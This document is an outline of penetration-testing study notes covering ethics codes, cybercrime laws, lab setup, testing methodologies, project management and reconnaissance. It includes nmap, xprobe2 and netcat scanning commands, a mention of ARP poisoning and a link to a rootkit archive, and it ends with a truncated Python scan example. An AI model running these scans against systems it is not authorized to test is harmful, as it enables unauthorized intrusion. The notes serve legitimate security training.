1. Ethics & Hacking
    1. Getting Permission to Hack
      1. What is the difference between White Hat and Black Hat hackers? => “permission”
    2. Code of Ethics Canons [(ISC)2]
        1. Protect society, the commonwealth, and the infrastructure
        2. Act honorably, honestly, justly, responsibly, and legally
        3. Provide diligent and competent service to principals
        4. Advance and protect the profession
      1. It is really difficult to define exactly what constitutes an ethical or unethical hacker
    3. Why Stay Ethical?
      1. Types of computer hackers
        1. Black Hat Hackers
          1. Those who conduct unauthorized penetration attacks against information systems
          2. The reason behind this activity ranges from curiosity to financial gain
          3. In some cases: their activities do not violate the laws of their country
        2. White Hat Hackers
          1. Those individuals who perform security assessments within a contractual agreement
          2. who’s more capable—the Black Hat hacker or the White Hat hacker?
        3. Gray Hat Hackers
    4. Ethical Standards
      1. Depending on your certification/location/affiliation
      2. Certifications
        1. (ISC)2
          1. Protect society, the commonwealth, and the infrastructure
          2. Act honorably, honestly, justly, responsibly, and legally
          3. Provide diligent and competent service to principals
          4. Advance and protect the profession
        2. SANS Institute
          1. I will strive to know myself and be honest about my capability
          2. I will conduct my business in a manner that assures that the IT profession is considered one of integrity and professionalism
          3. I respect privacy and confidentiality.
      3. Employer
        1. Almost every company has an ethical standards policy
        2. make sure you include within the contract as part of the recipient’s obligation a clause stating that they have read and will follow your company’s information security policies and ethics standards.
      4. Educational and Institutional Organizations
        1. Many organizations have instituted their own ethical standards
        2. making membership within the organization dependent on acceptance of these ethical standards
      5. Information Systems Security Association (ISSA)
        1. Perform all professional activities and duties in accordance with all applicable laws and the highest ethical principles
        2. Promote generally accepted information security current best practices and standards
        3. Maintain appropriate confidentiality of proprietary or otherwise sensitive information encountered in the course of professional activities
        4. Discharge professional responsibilities with diligence and honesty
        5. Refrain from any activities which might constitute a conflict of interest or otherwise damage the reputation of employers, the information security profession, or the association, and
        6. Not intentionally injure or impugn the professional reputation or practice of colleagues, clients, or employers
      6. Internet Activities Board (RFC 1087, “Ethics and the Internet”): characterizes as unethical and unacceptable any activity which purposely
        1. Seeks to gain unauthorized access to the resources of the Internet
        2. Disrupts the intended use of the Internet
        3. Wastes resources (people, capacity, computer) through such actions
        4. Destroys the integrity of computer-based information, and/or
        5. Compromises the privacy of users
      7. Institute of Electrical and Electronics Engineers (IEEE)
        1. To accept responsibility in making decisions consistent with the safety, health and welfare of the public, and to disclose promptly factors that might endanger the public or the environment
        2. To avoid real or perceived conflicts of interest whenever possible and to disclose them to affected parties when they do exist
        3. To be honest and realistic in stating claims or estimates based on available data
        4. To reject bribery in all its forms
        5. To improve the understanding of technology, its appropriate application, and potential consequences
        6. To maintain and improve our technical competence and to undertake technological tasks for others only if qualified by training or experience, or after full disclosure of pertinent limitations
        7. To seek, accept, and offer honest criticism of technical work, to acknowledge and correct errors, and to credit properly the contributions of others
        8. To treat fairly all persons regardless of such factors as race, religion, gender, disability, age, or national origin
        9. To avoid injuring others, their property, reputation, or employment by false or malicious action
        10. To assist colleagues and coworkers in their professional development and to support them in following this code of ethics
      8. Organisation for Economic Co-operation and Development (OECD) privacy principles
        1. Collection Limitation Principle
        2. Data Quality Principle
        3. Purpose Specification Principle
        4. Use Limitation Principle
        5. Security Safeguards Principle
        6. Openness Principle
        7. Individual Participation Principle
        8. Accountability Principle
    5. Computer Crime Laws
      1. Types Of Laws
        1. Civil Law
        2. Criminal Law
        3. Administrative/Regulatory Law
      2. Type Of Computer Crimes And Attacks
        1. Denial of service
        2. Destruction or alteration of information
        3. Dumpster diving
        4. Emanation eavesdropping
        5. Embezzlement
        6. Espionage
        7. Illegal content of material
        8. Information warfare
        9. Malicious code
        10. Masquerading
        11. Social engineering
        12. Software piracy
        13. Spoofing of Internet Protocol (IP) addresses
        14. Terrorism
        15. Theft of passwords
        16. Use of easily-accessible exploit scripts
        17. Network intrusions
      3. U.S. Federal Law
        1. 1970 U.S. Fair Credit Reporting Act
        2. 1970 U.S. Racketeer Influenced and Corrupt Organization (RICO) Act
        3. 1973 U.S. Code of Fair Information Practices
        4. 1974 U.S. Privacy Act
        5. 1978 Foreign Intelligence Surveillance Act
        6. 1986 U.S. Computer Fraud and Abuse Act (amended 1996)
        7. 1986 U.S. Electronic Communications Privacy Act
        8. 1987 U.S. Computer Security Act
        9. 1991 U.S. Federal Sentencing Guidelines
        10. 1994 U.S. Communications Assistance for Law Enforcement Act
        11. 1996 U.S. Economic and Protection of Proprietary Information Act
        12. 1996 U.S. Kennedy-Kassebaum Health Insurance Portability and Accountability Act (HIPAA) (amended 2000)
        13. 1996 Title I, Economic Espionage Act
        14. 1998 U.S. DMCA
        15. 1999 U.S. Uniform Computer Information Transactions Act (UCITA)
        16. 2000 U.S. Congress Electronic Signatures in Global and National Commerce Act
        17. 2001 USA PATRIOT Act
        18. 2002 E-Government Act, Title III, the FISMA
      4. U.S. State Law
        1. California SB 1386, in 2003
        2. By 2005, 22 states had enacted similar laws
      5. International Laws
        1. Canada
          1. Criminal Code of Canada, Section 342—Unauthorized Use of Computer
          2. Criminal Code of Canada, Section 184—Interception of Communications
        2. United Kingdom
          1. The Computer Misuse Act (CMA) 1990 (Chapter 18)
          2. The Regulation of Investigatory Powers Act 2000 (Chapter 23)
          3. The Anti-terrorism, Crime and Security Act 2001 (Chapter 24)
          4. The Data Protection Act 1998 (Chapter 29)
          5. The Fraud Act 2006 (Chapter 35)
          6. Potentially the Forgery and Counterfeiting Act 1981 (Chapter 45)
          7. The CMA was recently amended by the Police and Justice Act 2006 (Chapter 48)
          8. The Privacy and Electronic Communications (EC Directive) Regulations 2003
        3. Australia
          1. Cybercrime Act 2001
          2. Crimes Act 1900 (NSW): Part 6, ss 308-308I
          3. Criminal Code Act Compilation Act 1913 (WA)
        4. Malaysia
          1. Computer Crimes Act 1997 (Act 563)
        5. Singapore
          1. Computer Misuse Act 1993 (Chapter 50A)
        6. Venezuela
          1. Special Computer Crimes Act (Ley Especial de Delitos Informáticos)
        7. Safe Harbor And Directive 95/46/EC
    6. Getting Permission to Hack
      1. Confidentiality Agreement
      2. Company Obligations
      3. Contractor Obligations
      4. Auditing and Monitoring
      5. Conflict Management
  2. Setting up Your Lab
    1. Targets in a Pentest Lab
      1. Problems with Learning to Hack
        1. No legitimate targets online to practice against.
          2. it is nearly impossible for a person to create a pentest scenario and then learn from attacking it, because they already know where the weaknesses are
        3. The only way to learn is to practice against scenarios created by others
      2. Real-World Scenarios
        1. Learning to hack using real-world servers is risky
          2. Production labs are expensive and access to them is often limited
        3. unless you have the money to throw at the problem, you will need to develop a personal lab
      3. Turn-Key Scenarios
        1. The disadvantage to turn-key pentest scenarios is that they only imitate real-world servers but may not do so faithfully
        2. Despite the disadvantages, turn-key scenarios are the preferred method to learning how to conduct a penetration test.
      4. What Is a LiveCD?
        1. De-ICE
            1. De-ICE LiveCDs are bootable disc images of small but real servers that contain real-world challenges
          2. Available since January 2007
          3. The challenge is to discover what applications are misconfigured or exploitable and to obtain unauthorized access to the root account
            4. Possible vulnerabilities in the De-ICE challenges
              1. Bad/weak passwords
              2. Unnecessary services
                1. ftp
                2. telnet
                3. rlogin
              3. Unpatched services
              4. Too much information available (contact info, and so forth)
              5. Poor system configuration
              6. Poor/no encryption methodology
              7. Elevated user privileges
              8. No Internet Protocol (IP) Security filtering
              9. Incorrect firewall rules (plug in and forget?)
              10. Clear-text passwords
              11. Username/password embedded in software
              12. No alarm monitoring
            5. Well-known exploits are not included in the De-ICE challenges
        2. Hackerdemia
          1. designed to be a training platform where various hacker tools could be used and learned
          2. Developed on the Slax Linux
          3. Open Web Application Security Project (OWASP)
            1. www.owasp.org
            2. One of the OWASP projects is WebGoat, a deliberately insecure Web application for practising attacks
            3. Categories of Web-based attack vectors within WebGoat
              1. Code quality
              2. Unvalidated parameters
              3. Broken access control
              4. Broken authentication and session management
              5. Cross-site scripting (XSS)
              6. Buffer overflows
              7. Injection flaws
              8. Insecure storage
              9. Denial of service (DoS)
              10. Insecure configuration management
              11. Web services
              12. AJAX security
    2. Virtual Network Pentest Labs
      1. Keeping It Simple
        1. Cost is usually a driver in trying to keep personal labs small and manageable
        2. There is also no need to maintain a large library of applications
        3. Unless a personal lab retains any sensitive data, a lot of security controls can be eliminated
      2. Virtualization Software
        1. VMware (the hypervisor that hosts the lab machines)
        2. Guest images run inside it
          1. BackTrack (attack platform)
          2. De-ICE (target LiveCDs)
    3. Protecting Penetration Test Data
      1. Encryption Schemas
        1. Data Encryption
        2. Data Hashing
      2. Securing Pentest Systems
        1. Encrypt the hard drive
        2. Lock hard drives in a safe
        3. Store systems in a physically controlled room
        4. Perform penetration tests against the pentest systems
      3. Mobile Security Concerns
      4. Wireless Lab Data
        1. two separate labs should be created
          1. a wireless lab designed to practice wireless hacking
          2. a separate lab that can be used to conduct system attacks
    4. Advanced Pentest Labs
      1. Hardware Considerations
        1. Routers
        2. Firewalls
          1. Firewall evasion is an advanced skill that needs practice
          2. Stateful and stateless firewalls present different problems as well
        3. Intrusion Detection System/Intrusion Prevention System
          1. the most widely used IDS/IPS is the Open Source application Snort
          2. www.snort.org
      2. Hardware Configuration
        1. De-ICE Network
        2. Challenges
        3. Network Architecture
      3. Operating Systems and Applications
        1. Operating Systems
          1. www.packetstormsecurity.org/UNIX/penetration/rootkits/
          2. Packet Storm links to downloadable rootkits
        2. Applications
          1. remote-db.com
      4. Analyzing Malware—Viruses and Worms
        1. Virtual Versus Nonvirtual Labs
        2. Creating a Controlled Environment
          1. www.xen.org,
          2. Possible lab configuration using Xen hypervisor.
          3. all wireless communication must be disabled
        3. Harvesting Malware
          1. connecting a honeypot directly to the Internet
          2. This allows Nepenthes to harvest malware directly from Internet attacks
        4. Information Analysis
          1. tools
          2. Wireshark
          3. reverse engineering
      5. Other Target Ideas
        1. CTF Events
          1. DefCon CTF
          2. www.openctf.com
          3. www.captf.com/wiki/Main_Page
        2. Web-Based Challenges
          1. www.hackthissite.org/
          2. Crackmes.de
          3. www.hellboundhackers.org
          4. www.try2hack.nl/
        3. Vulnerability Announcements
  3. Methodologies & Frameworks
    1. Information System Security Assessment Framework
      1. the ISSAF is a peer-reviewed process that provides in-depth information about how to conduct a penetration test
      2. a professional penetration tester will use most, if not all, of the tools described in the ISSAF
      3. numerous examples of how tools are used within a pentest engagement
      4. a serious problem with the ISSAF is the lack of updates
      5. the last update to the ISSAF document was in 2006
      6. layers
        1. Information Gathering
        2. Network Mapping
        3. Vulnerability Identification
        4. Penetration
        5. Gaining Access and Privilege Escalation
        6. Enumerating Further
        7. Compromise Remote Users/Sites
        8. Maintaining Access
        9. Covering Tracks
      7. targets
        1. Networks
        2. Hosts
        3. Applications
        4. Databases
      8. phases
        1. Planning and Preparation—Phase I
          1. the steps to exchange initial information, plan, and prepare for the test
          2. Before testing, a formal Assessment Agreement is signed by both parties
          3. Identification of contact individuals from both side
          4. Opening meeting to confirm the scope, approach, and methodology
          5. Agree to specific test cases and escalation paths
        2. Assessment—Phase II
          1. Network Security
            1. Password Security Testing
            2. Switch Security Assessment
            3. Router Security Assessment
            4. Firewall Security Assessment
            5. Intrusion Detection System Security Assessment
            6. Virtual Private Network Security Assessment
            7. Antivirus System Security Assessment and Management Strategy
            8. Storage Area Network Security
            9. Wireless Local Area Network Security Assessment
            10. Internet User Security
            11. AS 400 Security
            12. Lotus Notes Security
          2. Host Security
            1. Unix/Linux System Security Assessment
            2. Windows System Security Assessment
            3. Novell Netware Security Assessment
            4. Web Server Security Assessment
          3. Application Security
            1. Web Application Security Assessment
            2. SQL Injections
            3. Source Code Auditing
            4. Binary Auditing
          4. Database Security
            1. Remote enumeration of databases
            2. Brute-forcing databases
            3. Process manipulation attack
            4. End-to-end audit of databases
          5. Social Engineering
        3. Reporting, Clean-up, and Destroy Artifacts—Phase III
          1. Reporting
            1. Types
              1. Verbal
              2. Written
            2. The final written report should contain
              1. Management summary
              2. Project scope
              3. Penetration test tools used
              4. Exploits used
              5. Date and time of the tests
              6. All outputs of the tools and exploits
              7. A list of identified vulnerabilities
              8. Recommendations to mitigate identified vulnerabilities, organized into priorities
          2. Clean-up and Destroy Artifacts
    2. Open Source Security Testing Methodology Manual
      1. OSSTMM
        1. Introduced to the Information System Security industry in 2000
        2. The current release is version 3.0
        3. maintained by the Institute for Security and Open Methodologies
        4. www.isecom.org
      2. Rules of Engagement
        1. Project Scope
        2. Confidentiality and Nondisclosure Assurance
        3. Emergency Contact Information
        4. Statement of Work Change Process
        5. Test Plan
        6. Test Process
        7. Reporting
      3. Channels
        1. Human Security
        2. Physical Security
        3. Communications
        4. Telecommunications
        5. Data Networks
          1. Network Surveying
          2. Enumeration
          3. Identification
          4. Access Process
          5. Services Identification
          6. Authentication
          7. Spoofing
          8. Phishing
          9. Resource Abuse
      4. Modules
        1. Phase I: Regulatory
          1. Posture Review
          2. Logistics
          3. Active Detection Verification
        2. Phase II: Definitions
          1. Visibility Audit
          2. Access Verification
          3. Trust Verification
          4. Controls Verification
        3. Phase III: Information Phase
          1. Process Verification
          2. Configuration Verification
          3. Property Validation
          4. Segregation Review
          5. Exposure Verification
          6. Competitive Intelligence Scouting
        4. Phase IV: Interactive Controls Test Phase
          1. Quarantine Verification
          2. Privileges Audit
          3. Survivability validation
          4. Alert and Log Review
  4. Pentest Project Management
    1. Quantitative, Qualitative, and Mixed Methods
      1. Quantitative Analysis
        1. we rely on numbers—and lots of them
        2. Don’t always assume that the measurable data gathered are always correct.
      2. Qualitative Analysis
        1. Unlike quantitative analysis, which relies strictly on measurable data, qualitative analysis relies on expert opinion and judgement
        2. example: the origin of an attack
        3. difference between threat and risk
          1. a threat is something that can do damage to a system
          2. The risk describes the likelihood and impact of the threat
        4. The disadvantage: opinions can be biased and influenced by external factors
        5. to prevent bias: use of anonymous submissions
      3. Mixed Method Analysis
        1. The use of just one method to determine metrics is insufficient
        2. requires a larger amount of time and resources
        3. Pentest findings need to be written to match stakeholder expectations
    2. Management of a Pentest
      1. Introduction to PMBOK
        1. First published by the PMI in 1987
        2. attempts to standardize project management practices and information
      2. project life cycle
        1. Initiating Process Group
          1. Develop Project Charter
          2. Identify Stakeholders
        2. Planning Process Group
          1. Develop Project Management Plan
          2. Collect Requirements
            1. translating business objectives into technical requirements
            2. Limitations should also be collected
          3. Define Scope
            1. objectives
            2. requirements
            3. boundaries
            4. assumptions
            5. deliverables of a project
          4. Create WBS (Work Breakdown Structure)
            1. the actual work that needs to be done to complete the project
            2. The WBS is not a schedule
          5. Sequence Activities
          6. Estimate Activity Resources (type and quantities)
            1. material
            2. people
            3. equipment
          7. Estimate Activity Durations
          8. Develop Schedule
          9. Estimate Costs
            1. the project may not be worth the cost compared to the revenue the project will generate
          10. Determine Budget
          11. Plan Quality
          12. Develop Human Resource Plan
          13. Plan Communications
          14. Plan Risk Management
          15. Identify Risks
          16. Perform Qualitative Risk Analysis
          17. Plan Risk Responses
          18. Plan Procurements
        3. Executing Process Group
          1. Direct and Manage Project Execution
          2. Perform Quality Assurance
          3. Acquire Project Team
          4. Develop Project Team
          5. Manage Project Team
          6. Distribute Information
          7. Manage Stakeholder Expectations
          8. Conduct Procurements
        4. Closing Process Group
          1. Close Project or Phase
          2. Close Procurements
        5. Monitoring and Controlling Process Group
          1. Monitor and Control Project Work
          2. Perform Integrated Change Control
          3. Verify Scope
          4. Control Scope
          5. Control Schedule
          6. Control Costs
          7. Perform Quality Control
          8. Report Performance
          9. Monitor and Control Risks
          10. Administer Procurements
    3. Project Team Members
      1. Roles and Responsibilities
        1. Team Champion
        2. Project Manager
        3. Pentest Engineers
      2. Organizational Structure
        1. Functional Organization
        2. Matrix Organization
        3. Projectized Organization
    4. Project Management
      1. Initiating Stage
        1. processes
          1. develop project charter
          2. identify stakeholders
        2. potential stakeholders
          1. Client/Customer Organization
          2. Project Sponsor
          3. Point of Contact
          4. Senior Management
          5. Target System/Network Manager
          6. Target System/Network Administrators
          7. Network Administrators
          8. Network Defense Administrators
          9. Penetration Test Team
          10. Project Manager
          11. Functional Manager
          12. Senior Management
          13. Pentest Engineers
          14. Procurement Department
          15. Government Agencies
          16. Local law Enforcement
          17. Local Law Enforcement Investigators
          18. Federal Law Enforcement
          19. Third-Party Groups
          20. Internet Service Providers
          21. Subject-Matter Experts/Consultants
      2. Planning Stage
      3. Executing Stage
      4. Monitoring and Controlling
      5. Closing Stage
        1. Formal Project Review
        2. Effort Evaluation
        3. Identification of New Projects
        4. Future Project Priority Identification
          1. Overall security risk to the client
          2. Cost of each project
          3. Financial gain of each project
          4. Length of time needed for each project
          5. Skills needed to successfully complete each project
          6. Staff/resource availability
          7. Project sponsor/requestor
    5. Solo Pentesting
      1. Initiating Stage
      2. Planning Process Stage
        1. Collect Requirements
        2. Define Scope
        3. Estimate Activity Durations
        4. Develop Schedule
        5. Plan Quality
        6. Plan Communications
        7. Identify Risks
        8. Plan Risk Responses
        9. Plan Procurements
      3. Executing Stage
        1. Direct and Manage Project Execution
        2. Manage Stakeholder Expectations
      4. Closing Stage
        1. ensures that all the reporting is completed
        2. concludes the contract
      5. Monitoring and Controlling
        1. Monitor and Control Project Work
        2. Verify Scope
        3. Control Scope
        4. Perform Quality Control
        5. Monitor and Control Risks
    6. Archiving Data
      1. Should You Keep Data?
        1. two schools
          1. keep everything
          2. keep nothing
        2. Legal Issues
        3. E-mail
          1. some e-mails will contain sensitive data that should be protected
            2. Proper encryption and access control mechanisms must be in place
        4. Findings and Reports
      2. Securing Documentation
        1. Access Controls
        2. Archival Methods
        3. Archival Locations
        4. Destruction Policies
    7. Cleaning up Your Lab
      1. Archiving Lab Data
        1. Proof of Concepts
        2. Malware Analysis
      2. Creating and Using System Images
        1. License Issues
        2. Virtual Machines
        3. “Ghost” Images
      3. Creating a “Clean Shop”
        1. Sanitization Methods Using Hashes
        2. Change Management Controls
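An added example (not part of the original notes) of the hash-based sanitization just listed, which also serves the "Data Hashing" control under Protecting Penetration Test Data: record SHA-256 digests of a baseline lab image or evidence set, then re-verify to show what was modified, left behind or removed. The directory layout and file contents are constructed in a temporary directory for the demonstration; the function names are my own.

```python
"""Hash manifest for a lab "clean shop" and for pentest-data integrity.

Added example, not from the original notes. build_manifest() records a SHA-256
per file; verify_manifest() diffs a later state against that baseline. The same
routine proves evidence files are unchanged when the manifest is kept separately.
"""
import hashlib
import json
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str, chunk: int = 1 << 16) -> str:
    """Stream the file through SHA-256 so large disk images do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map each file's path (relative to root, '/'-separated) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def verify_manifest(root: str, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the tree under root with the baseline: modified, added (leftover) and missing files."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def save_manifest(manifest: Dict[str, str], path: str) -> None:
    """Store the baseline outside the tree it describes (otherwise it would hash itself)."""
    with open(path, "w") as f:
        json.dump(manifest, f, indent=2, sort_keys=True)


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a toy lab image, 'use' it, then re-check it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(root, "etc", "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")
        with open(os.path.join(root, "tool.sh"), "w") as f:
            f.write("#!/bin/sh\necho clean\n")
        baseline = build_manifest(root)
        # What a finished test can leave behind (constructed):
        with open(os.path.join(root, "etc", "passwd"), "a") as f:
            f.write("backdoor:x:0:0::/:/bin/sh\n")        # modified file
        with open(os.path.join(root, "exploit.py"), "w") as f:
            f.write("print('poc')\n")                      # leftover artifact
        os.remove(os.path.join(root, "tool.sh"))           # missing file
        return verify_manifest(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run the baseline before the engagement and the verification before the image is returned to the library; an empty result for all three lists is the "clean" state, and the manifest is what change management signs off on.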
    8. Planning for Your Next Pentest
      1. Risk Management Register
        1. Creating a Risk Management Register
        2. Prioritization of Risks and Responses
      2. Knowledge Database
        1. Creating a Knowledge Database
        2. Sanitization of Findings
        3. Project Management
        4. Knowledge Database
          1. Points of contacts internal to the company
          2. Points of contacts of client organizations
          3. Resource vendors
          4. List of subject-matter experts
          5. List of past team members and current contact information
          6. Contracts
          7. Statements of work
          8. Project templates
      3. After-Action Review
        1. Project Assessments
          1. Scheduling issues (too little time, too much time, and so forth)
          2. Resource availability
          3. Risk management
          4. Project scope issues (too broad, too narrow, and so forth)
          5. Communication issues
        2. Team Assessments
          1. Technical strengths
          2. Technical weaknesses
          3. Level of effort within each component of the project
          4. Team training ideas
          5. Time management skills
          6. Obstacles that prevented effective teamwork
          7. Overall opinion on productivity of the team
        3. Training Proposals
  5. Information Gathering
    1. Passive Information Gathering
      1. Web Presence
        1. Tools
          1. Web browser
          2. Dogpile.com
          3. Alexa.org
          4. Archive.org
          5. Shodanhq.com
          6. dig
          7. nslookup
        2. Information
          1. Web site address(es)
          2. Web server type
          3. Server locations
          4. Dates, including “date last modified”
          5. Web links—both internally and externally
          6. Web server directory tree
          7. Technologies used (software/hardware)
          8. Encryption standards
          9. Web-enabled languages
          10. Form fields (including hidden fields)
          11. Form variables
          12. Method of form postings
          13. Company contact information
          14. Meta tags
          15. Any comments within Web pages
          16. E-commerce capabilities
          17. Services and products offered
        3. Exercise: gathering information about Nmap
          1. Step 1: Google "Nmap"
            1. Results
              1. Nmap.org
              2. Insecure.org
              3. Sectools.org
          2. Step 2: Alexa "Nmap.org"
            1. Alexa.org believes Nmap.org and Insecure.org are related
            2. Nmap.org permits subdomains, e.g. scanme.Nmap.org
          3. Step 3: nmap.org itself
            1. Archive.org
              1. allows us to see how the Web site has changed over the years
              2. it often has information no longer available through Google
              3. Archive.org does not provide the latest 6 months of archives
            2. Turn off all access to the target system: passive gathering means not connecting to the target directly, only to third-party sources
            3. Netcraft.com
            4. Google
              1. site:cgi.Insecure.org
      2. Corporate Data
        1. location
        2. employee information
        3. network information
        4. Google Maps
          1. adjoining buildings
          2. buildings across the street
          3. entrances
          4. window locations
          5. ingress/egress routes
          6. lighting
          7. cameras
          8. access controls
        5. Google Earth
        6. Bing maps
      3. Whois and DNS
        1. Whois
        2. dig
          1. query nameservers
          2. dig ns nmap.org
        3. nslookup
      4. Additional Internet Resources
        1. http://freenews.maxbaud.net
        2. check whether the target's mail server is listed in spam blocklists (DNSBLs)
          1. if so, it might indicate that the mail server was compromised in the past
          2. www.dnsbl.info
        3. job sites
    2. Active Information Gathering
      1. DNS Interrogation
        1. version number of the Berkeley Internet Name Domain (BIND) server, which BIND returns in the CHAOS-class TXT record version.bind unless the administrator has hidden it
        2. ns1.titan.net
      2. E-mail Accounts
        1. Goal: create a list of users that reside on the system
        2. helpful in any brute-force attack & login attempt
        3. social engineering purposes
      3. Perimeter Network Identification
      4. Network Surveying
        1. Goal: identify how many systems reside within the network and their associated IP address
        2. Use Nmap
          1. nmap -sF 192.168.1.1-255
        3. Use netdiscover
  6. Vulnerability Identification
    1. Port Scanning
      1. Target Verification
        1. Active Scans
          1. Ping: ICMP messages used to determine if the target is alive
            1. Echo Request: set the Type field to 8 and send it
            2. Echo Reply: if the target system is alive, it returns a datagram with Type 0
            3. Results are not always accurate: many hosts and firewalls drop ICMP as protection against random scans
          2. nmap -sP 192.168.1.123 (ping scan; newer Nmap releases call this option -sn)
            1. sends an ICMP echo request and a TCP ACK packet, so hosts that drop ICMP can still be detected
          3. nmap -sP 192.168.1.0/24
        2. Passive Scans
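An added example (not from the original notes) of the Echo Request/Echo Reply exchange described above: it builds the Type 8 datagram that ping and nmap -sP send, computes the RFC 1071 checksum, and validates a Type 0 reply. The reply is simulated in-process so the code runs offline; send_probe() is the live variant and needs a raw socket (root), which is an assumption about the host, not something the notes specify.

```python
"""ICMP Echo Request/Reply construction and parsing (added example, not from the notes).

The identifier/sequence pair lets us match a reply to our own request; a valid
ICMP datagram sums to zero under the Internet checksum when its checksum field is included.
"""
import os
import socket
import struct
from typing import Dict, Optional

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words; odd length is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes = b"pentest") -> bytes:
    """ICMP header: type(1) code(1) checksum(2) identifier(2) sequence(2), then payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident & 0xFFFF, seq & 0xFFFF)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident & 0xFFFF, seq & 0xFFFF) + payload


def parse_echo_reply(datagram: bytes, expect_ident: int) -> Optional[Dict[str, object]]:
    """Return the reply's fields if it is a valid Echo Reply to our identifier, else None.

    Anything other than a Type 0 reply (or silence) does not prove the host is down:
    ICMP is commonly filtered, which is why nmap -sP also sends a TCP ACK.
    """
    if len(datagram) < 8:
        return None
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", datagram[:8])
    if icmp_type != ICMP_ECHO_REPLY or code != 0 or ident != expect_ident:
        return None
    if inet_checksum(datagram) != 0:        # corrupted or forged datagram
        return None
    return {"type": icmp_type, "ident": ident, "seq": seq, "payload": datagram[8:]}


def simulate_reply(request: bytes) -> bytes:
    """What an alive host returns: same identifier, sequence and payload, Type 0, fresh checksum."""
    _type, _code, _csum, ident, seq = struct.unpack("!BBHHH", request[:8])
    header = struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, 0, ident, seq)
    csum = inet_checksum(header + request[8:])
    return struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, csum, ident, seq) + request[8:]


def send_probe(target: str, ident: int, seq: int, timeout: float = 1.0) -> Optional[Dict[str, object]]:
    """Live probe (assumes root for SOCK_RAW). Returns the parsed reply or None on silence."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
        s.settimeout(timeout)
        s.sendto(build_echo_request(ident, seq), (target, 0))
        try:
            data, _ = s.recvfrom(1024)
        except socket.timeout:
            return None
    ihl = (data[0] & 0x0F) * 4              # raw ICMP sockets hand back the IPv4 header too
    return parse_echo_reply(data[ihl:], ident)


if __name__ == "__main__":
    ident = os.getpid() & 0xFFFF
    req = build_echo_request(ident, 1)
    print("request:", req.hex())
    print("reply  :", parse_echo_reply(simulate_reply(req), ident))
```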
      2. UDP Scanning
        1. disadvantages
          1. slow when compared to TCP scans
          2. most exploitable applications use TCP
        2. Possible results returned by a UDP scan
          1. Open: a UDP response confirms an active UDP port
          2. Open/filtered: no response was received (the service may be listening silently or a filter may be dropping the probe)
          3. Closed: an ICMP "port unreachable" message was returned
          4. Filtered: another type of ICMP unreachable error indicates a filtering device
        3. If OPEN or CLOSED, the target is ALIVE
        4. If OPEN/FILTERED or FILTERED, an IPS or firewall is intercepting the probes and we need to adjust our approach
        5. UDP scans are not something most firewall administrators think about
      3. TCP Scanning
        1. TCP Connect Scan (-sT)
          1. most reliable method of determining port activity
          2. complete three-way TCP handshake
          3. may be noticed by IDSes
          4. advantage: we will know for certain whether an application is truly present or not
        2. TCP SYN Stealth Scan (-sS)
          1. creates a half-open connection
          2. this might help against IDSes
          3. advantage: speed
      4. Perimeter Avoidance Scanning
        1. ACK Scan (-sA)
          1. send an ACK to the target system
          2. a stateless firewall assumes the packet belongs to a communication channel that already exists and lets it through; the host answers RST whether the port is open or closed
          3. so the scan never says whether a port is open, only whether it is filtered: a RST means unfiltered, no reply or an ICMP error means filtered, which maps the firewall ruleset
        2. Null Scan (-sN)
          1. no TCP flags set at all
        3. FIN (-sF) and Xmas Tree (-sX) Scans
          1. -sX sets FIN, PSH and URG
          2. all three rely on RFC 793 behaviour: a closed port answers RST, an open port stays silent, so "no reply" is reported as open|filtered
          3. Windows and many network devices answer RST regardless of port state, so against them every port looks closed
    2. System Identification
      1. Active OS Fingerprinting
        1. Nmap can scan a system and identify the OS
        2. nmap -O 192.168.1.100
        3. Another tool we can use is xprobe2
        4. xprobe2 -p tcp:80:open 192.168.1.100
      2. Passive OS Fingerprinting
        1. Requires a lot of patience
        2. Objective: capture TCP packets from the target without sending any of our own (the SYN of a normal connection carries the TTL, window size and option ordering that identify the OS)
        3. p0f Scan
        4. ARP poisoning attack (to route the target's traffic past our sniffer; from the network's point of view this is no longer passive)
    3. Services Identification
      1. Banner Grabbing
        1. Launch Nmap with -sV to send protocol probes to each open port and grab banner/version information from the applications
        2. Banner grabbing using Telnet
      2. Enumerating Unknown Services
        1. Connect to the ports manually and see what type of information is returned
        2. After we connect (using netcat), we can send random data and watch how the service reacts
        3. nc pWnOS 1000
        4. Connecting to target using smbclient.
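The connect scan from the Port Scanning section and the banner grab from the Services Identification section, as one added example that is not part of the original page. It runs the probes against a throwaway listener started on 127.0.0.1, so the port numbers and the OpenSSH-style banner it returns are constructed; only the classification rules (open, closed and filtered for a full-handshake scan, and sending data to a service that stays quiet) are the page's.

```python
# Added example (not from the original page): a TCP connect scan, the same
# full-handshake probe "nmap -sT" performs, followed by banner grabbing of
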